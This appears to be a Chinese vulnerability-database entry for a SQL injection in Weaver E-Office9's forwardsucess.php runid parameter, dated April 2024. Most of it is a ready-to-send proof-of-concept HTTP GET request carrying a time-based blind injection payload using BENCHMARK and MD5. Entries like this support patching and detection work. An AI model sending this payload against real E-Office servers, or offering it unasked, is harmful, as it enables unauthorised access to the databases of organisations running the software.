泛微 E-Office9 forwardsucess.php runid参数 SQL注入漏洞

日期: 2024-04-12 | 影响软件: 泛微E-Office | POC: 已公开

漏洞描述

泛微 E-Office9 forwardsucess.php runid参数存在SQL注入漏洞。

PoC代码

GET /E-mobile/flow/forwardsucess.php?runid=1+AND+9926%3DBENCHMARK%280000000%2CMD5%280x6d63524%29%29&flowid=&flowprcs=&prcsid=&module=&scope=&page=&fromid=&detailid=&mobilesessionkey=&sessionkey=&diff=&contents=1&touserid=WV00000304 HTTP/1.1

相关漏洞推荐